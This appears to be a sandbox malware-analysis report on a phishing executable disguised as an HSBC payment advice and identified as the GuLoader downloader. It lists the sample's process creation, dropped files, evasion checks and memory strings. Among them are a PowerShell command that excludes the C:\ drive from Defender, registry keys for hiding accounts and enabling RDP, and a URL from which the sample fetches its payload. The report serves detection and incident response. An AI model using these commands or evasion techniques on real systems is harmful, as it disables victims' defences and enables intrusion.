              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
              Source: C:\ProgramData\images.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
              Source: unknownProcess created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe"
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe"
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
              Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe"
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
              Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile created: C:\Users\user\AppData\Local\Microsoft Vision\Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkoahsjv.1ht.ps1Jump to behavior
              Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@10/6@3/1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_01
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior

              Data Obfuscation:

              barindex
              Yara detected GuLoaderShow sources
              Source: Yara matchFile source: 00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.378161921.0000000000710000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, type: MEMORY
              Yara detected VB6 Downloader GenericShow sources
              Source: Yara matchFile source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00402440 push 0040119Ah; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00407A43 push ecx; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00402454 push 0040119Ah; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00402468 push 0040119Ah; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00407E78 push 4EEBB783h; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00405679 push ds; iretd
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_0040247C push 0040119Ah; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00402418 push 0040119Ah; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_0040242C push 0040119Ah; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004024CC push 0040119Ah; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004024E0 push 0040119Ah; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004024F4 push 0040119Ah; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00402490 push 0040119Ah; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00405692 push ds; iretd
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00408A9F push 3A3ADF06h; retf
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004024A4 push 0040119Ah; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004024B8 push 0040119Ah; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004023C8 push 0040119Ah; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004023DC push 0040119Ah; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004095E9 push ebp; iretd
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004063EC push ecx; iretd
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004023FF push 0040119Ah; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004023AF push 0040119Ah; ret
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 12_2_017B01D0 push ebx; retf
              Source: C:\ProgramData\images.exeCode function: 28_2_017A1819 push ss; iretd
              Source: C:\ProgramData\images.exeCode function: 28_2_017A0877 push ds; iretd
              Source: C:\ProgramData\images.exeCode function: 28_2_017A20E4 push ds; ret
              Source: C:\ProgramData\images.exeCode function: 28_2_017A1CDB push ss; iretd
              Source: C:\ProgramData\images.exeCode function: 28_2_017A1C97 push ss; iretd
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile created: C:\ProgramData\images.exeJump to dropped file
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile created: C:\ProgramData\images.exeJump to dropped file

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Contains functionality to hide user accountsShow sources
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
              Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | delete
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Tries to detect Any.runShow sources
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile opened: C:\Program Files\qga\qga.exe
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile opened: C:\Program Files\qga\qga.exe
              Source: C:\ProgramData\images.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
              Source: C:\ProgramData\images.exeFile opened: C:\Program Files\qga\qga.exe
              Source: C:\ProgramData\images.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
              Source: C:\ProgramData\images.exeFile opened: C:\Program Files\qga\qga.exe
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: images.exe, 0000001C.00000002.775353631.0000000001AD0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=
              Source: HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://SPUREDGE.COM/WARZONE_JBBOXCEY72.BIN
              Source: HSBC Payment Advice.exe, 00000000.00000002.378371625.00000000021D0000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653629492.0000000002260000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
              Source: HSBC Payment Advice.exe, 00000000.00000002.378371625.00000000021D0000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653629492.0000000002260000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.775353631.0000000001AD0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe TID: 7136Thread sleep count: 60 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2868Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3055
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSystem information queried: ModuleInformation
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
              Source: images.exe, 0000001C.00000002.775353631.0000000001AD0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=
